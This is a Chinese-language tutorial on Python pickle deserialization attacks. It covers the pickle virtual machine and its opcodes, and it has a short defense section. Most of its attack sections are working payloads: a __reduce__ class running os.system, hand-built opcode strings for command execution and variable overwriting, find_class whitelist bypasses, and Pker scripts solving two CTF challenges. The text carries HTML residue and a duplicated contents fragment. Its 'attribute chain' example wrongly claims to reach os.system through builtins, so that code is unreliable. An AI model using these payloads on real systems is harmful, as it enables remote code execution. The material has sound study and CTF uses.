Pickle反序列化安全研究与实践指南<\/h1>

1. Pickle基础概念<\/h2>

1.1 Pickle简介<\/h3>

Pickle是Python专用的序列化与反序列化模块，具有以下特点：<\/p>

以二进制格式存储数据<\/li>
可以表示Python几乎所有类型（包括自定义类型）<\/li>
实际上是一种独立的语言，通过操作码(opcode)执行操作<\/li>

解析能力大于生成能力（直接编写的opcode比序列化生成的更灵活）<\/li> <\/ul>

1.2 可序列化对象类型<\/h3>

基本类型：None<\/code>、True<\/code>、False<\/code>、整数、浮点数、复数<\/li>
字符串类型：str<\/code>、bytes<\/code>、bytearray<\/code><\/li>
集合类型：tuple<\/code>、list<\/code>、set<\/code>、dict<\/code>（仅包含可序列化对象）<\/li>
函数与类：模块最外层的函数和类<\/li>

实例对象：实现了__reduce__()<\/code>方法的类实例<\/li>
<\/ul>
1.3 与JSON的对比<\/h3>



特性<\/th>
Pickle<\/th>
JSON<\/th>
<\/tr>
<\/thead>


格式<\/td>
二进制<\/td>
文本<\/td>
<\/tr>

跨语言<\/td>
仅Python<\/td>
支持多种语言<\/td>
<\/tr>

类型支持<\/td>
几乎所有Python类型<\/td>
基本内置类型<\/td>
<\/tr>

安全性<\/td>
不安全<\/td>
相对安全<\/td>
<\/tr>
<\/tbody>
<\/table>
2. Pickle工作机制<\/h2>
2.1 Pickle虚拟机(PVM)<\/h3>
PVM由三部分组成：<\/p>

解析引擎<\/strong>：读取并解释opcode和参数，直到遇到.<\/code>停止<\/li>
栈<\/strong>：Python列表实现，用于临时存储数据和对象<\/li>
内存(memo)<\/strong>：Python字典实现，存储已反序列化的数据<\/li>
<\/ol>
2.2 序列化过程<\/h3>

对象被转换为opcode流<\/li>
opcode流可以被保存或传输<\/li>
反序列化时PVM执行opcode重建对象<\/li>
<\/ol>
2.3 __reduce__()<\/code>方法<\/h3>
通过重写__reduce__()<\/code>可以控制对象如何被序列化和反序列化：<\/p>
import<\/span> os
<\/span><\/span>
<\/span><\/span>class<\/span> Exploit<\/span>(object):
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (os.<\/span>system, ('whoami'<\/span>,))
<\/span><\/span><\/code><\/pre>序列化后会生成包含R<\/code>操作码的字节流，反序列化时将执行指定的函数。<\/p>
3. Pickle操作码详解<\/h2>
3.1 常用操作码表<\/h3>



Opcode<\/th>
描述<\/th>
示例<\/th>
栈变化<\/th>
<\/tr>
<\/thead>


c<\/td>
获取全局对象<\/td>
cmodule\ninstance\n<\/code><\/td>
对象入栈<\/td>
<\/tr>

o<\/td>
调用栈上函数<\/td>
o<\/code><\/td>
参数出栈，结果入栈<\/td>
<\/tr>

i<\/td>
导入并调用<\/td>
imodule\ncallable\n<\/code><\/td>
参数出栈，结果入栈<\/td>
<\/tr>

(<\/td>
压入MARK标记<\/td>
(<\/code><\/td>
MARK入栈<\/td>
<\/tr>

t<\/td>
组合为元组<\/td>
t<\/code><\/td>
数据出栈，元组入栈<\/td>
<\/tr>

R<\/td>
调用函数<\/td>
R<\/code><\/td>
函数和参数出栈，结果入栈<\/td>
<\/tr>

p<\/td>
存储到memo<\/td>
p0\n<\/code><\/td>
无<\/td>
<\/tr>

g<\/td>
从memo读取<\/td>
g0\n<\/code><\/td>
对象入栈<\/td>
<\/tr>

.<\/td>
结束<\/td>
.<\/code><\/td>
无<\/td>
<\/tr>
<\/tbody>
<\/table>
3.2 版本差异<\/h3>
Pickle有6个版本，v0最易读，兼容所有Python版本：<\/p>
import<\/span> pickle
<\/span><\/span>a =<\/span> {'1'<\/span>: 1<\/span>, '2'<\/span>: 2<\/span>}
<\/span><\/span>print(pickle.<\/span>dumps(a, protocol=<\/span>0<\/span>))  # v0 opcode<\/span>
<\/span><\/span><\/code><\/pre>3.3 手动构造示例<\/h3>
执行系统命令<\/h4>
b<\/span>'''cos
<\/span><\/span><\/span>system
<\/span><\/span><\/span>(S'whoami'
<\/span><\/span><\/span>tR.'''<\/span>
<\/span><\/span><\/code><\/pre>变量覆盖<\/h4>
b<\/span>'''c__main__
<\/span><\/span><\/span>secret
<\/span><\/span><\/span>(S'name'
<\/span><\/span><\/span>S'new_value'
<\/span><\/span><\/span>db.'''<\/span>
<\/span><\/span><\/code><\/pre>4. 安全漏洞与利用技术<\/h2>
4.1 常见攻击方式<\/h3>

任意代码执行<\/strong>：通过__reduce__<\/code>或opcode执行系统命令<\/li>
变量覆盖<\/strong>：修改关键变量绕过认证<\/li>
属性注入<\/strong>：向对象注入恶意属性<\/li>
<\/ol>
4.2 find_class()<\/code>限制与绕过<\/h3>
Python官方建议通过重写Unpickler.find_class()<\/code>实现白名单：<\/p>
class<\/span> RestrictedUnpickler<\/span>(pickle.<\/span>Unpickler):
<\/span><\/span>    def<\/span> find_class<\/span>(self, module, name):
<\/span><\/span>        if<\/span> module ==<\/span> 'builtins'<\/span> and<\/span> name in<\/span> safe_list:
<\/span><\/span>            return<\/span> getattr(builtins, name)
<\/span><\/span>        raise<\/span> pickle.<\/span>UnpicklingError("forbidden"<\/span>)
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

利用已导入模块的链式调用<\/li>
通过getattr<\/code>获取被禁用的函数<\/li>
修改sys.modules<\/code>引入被禁模块<\/li>
<\/ul>
4.3 CTF实战技巧<\/h3>
1. 基础RCE<\/h4>
import<\/span> pickle
<\/span><\/span>import<\/span> os
<\/span><\/span>
<\/span><\/span>class<\/span> Exploit<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (os.<\/span>system, ('whoami'<\/span>,))
<\/span><\/span>
<\/span><\/span>pickle.<\/span>dumps(Exploit())
<\/span><\/span><\/code><\/pre>2. 绕过find_class<\/code>限制<\/h4>
当只能使用__main__<\/code>模块时：<\/p>
b<\/span>'''c__main__
<\/span><\/span><\/span>secret
<\/span><\/span><\/span>(S'key'
<\/span><\/span><\/span>S'new_value'
<\/span><\/span><\/span>db.'''<\/span>
<\/span><\/span><\/code><\/pre>3. 利用sys.modules<\/code><\/h4>
b<\/span>'''csys
<\/span><\/span><\/span>modules
<\/span><\/span><\/span>(S'sys'
<\/span><\/span><\/span>csys
<\/span><\/span><\/span>modules
<\/span><\/span><\/span>s.'''<\/span>
<\/span><\/span><\/code><\/pre>5. 高级利用技术<\/h2>
5.1 描述器攻击<\/h3>
通过实现__set__<\/code>方法控制属性赋值：<\/p>
User =<\/span> GLOBAL('module'<\/span>, 'User'<\/span>)
<\/span><\/span>User.<\/span>__set__ =<\/span> GLOBAL('module'<\/span>, 'User'<\/span>)
<\/span><\/span>User.<\/span>privileged =<\/span> True<\/span>  # 实际不会赋值，而是调用__set__<\/span>
<\/span><\/span><\/code><\/pre>5.2 多段payload拼接<\/h3>
去掉第一个payload的.<\/code>，直接拼接：<\/p>
payload1 =<\/span> b<\/span>'''(S'key1'
<\/span><\/span><\/span>S'value1'
<\/span><\/span><\/span>d'''<\/span>
<\/span><\/span>payload2 =<\/span> b<\/span>'''(S'key2'
<\/span><\/span><\/span>S'value2'
<\/span><\/span><\/span>d.'''<\/span>
<\/span><\/span>final_payload =<\/span> payload1 +<\/span> payload2
<\/span><\/span><\/code><\/pre>5.3 属性链操作<\/h3>
# 获取os.system<\/span>
<\/span><\/span>getattr =<\/span> GLOBAL('builtins'<\/span>, 'getattr'<\/span>)
<\/span><\/span>dict =<\/span> GLOBAL('builtins'<\/span>, 'dict'<\/span>)
<\/span><\/span>dict_get =<\/span> getattr(dict, 'get'<\/span>)
<\/span><\/span>globals =<\/span> GLOBAL('builtins'<\/span>, 'globals'<\/span>)()
<\/span><\/span>builtins =<\/span> dict_get(globals, 'builtins'<\/span>)
<\/span><\/span>system =<\/span> getattr(builtins, 'system'<\/span>)
<\/span><\/span>system('whoami'<\/span>)
<\/span><\/span><\/code><\/pre>6. Pker工具使用<\/h2>
Pker是生成pickle opcode的高级工具，语法类似Python：<\/p>
6.1 基本语法<\/h3>
# 全局变量覆盖<\/span>
<\/span><\/span>secret =<\/span> GLOBAL('__main__'<\/span>, 'secret'<\/span>)
<\/span><\/span>secret.<\/span>name =<\/span> 'hacked'<\/span>
<\/span><\/span>
<\/span><\/span># 函数执行<\/span>
<\/span><\/span>system =<\/span> GLOBAL('os'<\/span>, 'system'<\/span>)
<\/span><\/span>system('whoami'<\/span>)
<\/span><\/span>
<\/span><\/span># 实例化对象<\/span>
<\/span><\/span>animal =<\/span> INST('__main__'<\/span>, 'Animal'<\/span>, 'name'<\/span>, 'category'<\/span>)
<\/span><\/span><\/code><\/pre>6.2 CTF解题示例<\/h3>
BalsnCTF pyshv3<\/h4>
User =<\/span> GLOBAL('structs'<\/span>, 'User'<\/span>)
<\/span><\/span>User.<\/span>__set__ =<\/span> GLOBAL('structs'<\/span>, 'User'<\/span>)
<\/span><\/span>des =<\/span> User('des'<\/span>, 'des'<\/span>)
<\/span><\/span>User.<\/span>privileged =<\/span> des
<\/span><\/span>user =<\/span> User('attacker'<\/span>, 'group'<\/span>)
<\/span><\/span>return<\/span> user
<\/span><\/span><\/code><\/pre>SUCTF guess_game<\/h4>
ticket =<\/span> INST('guess_game.Ticket'<\/span>, 'Ticket'<\/span>, (1<\/span>,))
<\/span><\/span>game =<\/span> GLOBAL('guess_game'<\/span>, 'game'<\/span>)
<\/span><\/span>game.<\/span>win_count =<\/span> 9<\/span>
<\/span><\/span>game.<\/span>round_count =<\/span> 9<\/span>
<\/span><\/span>game.<\/span>curr_ticket =<\/span> ticket
<\/span><\/span>return<\/span> ticket
<\/span><\/span><\/code><\/pre>7. 防御建议<\/h2>

使用JSON等安全格式<\/strong>替代pickle<\/li>
严格白名单<\/strong>限制find_class<\/code>可用的模块和类<\/li>
签名验证<\/strong> pickle数据完整性<\/li>
沙箱环境<\/strong> 执行反序列化操作<\/li>
监控<\/strong> pickle反序列化过程<\/li>
<\/ol>
8. 总结<\/h2>
Pickle反序列化漏洞利用关键点：<\/p>

理解PVM工作机制和opcode语义<\/li>
掌握__reduce__<\/code>和find_class<\/code>的绕过方法<\/li>
熟悉Python内置模块和魔术方法<\/li>
能够手动构造或使用工具生成opcode<\/li>
<\/ul>
安全开发建议：<\/p>

避免反序列化不可信数据<\/li>
使用最严格的find_class<\/code>白名单<\/li>
考虑使用更安全的替代方案如json<\/code><\/li>
<\/ul>

Pickle反序列化安全研究与实践指南<\/h1>

1. Pickle基础概念<\/h2>

2. Pickle工作机制<\/h2>

3.3 手动构造示例<\/h3>

4. 安全漏洞与利用技术<\/h2>

4.3 CTF实战技巧<\/h3>

5. 高级利用技术<\/h2>

6. Pker工具使用<\/h2> Pker是生成pickle opcode的高级工具，语法类似Python：<\/p>

6.2 CTF解题示例<\/h3>

6. Pker工具使用<\/h2>
Pker是生成pickle opcode的高级工具，语法类似Python：<\/p>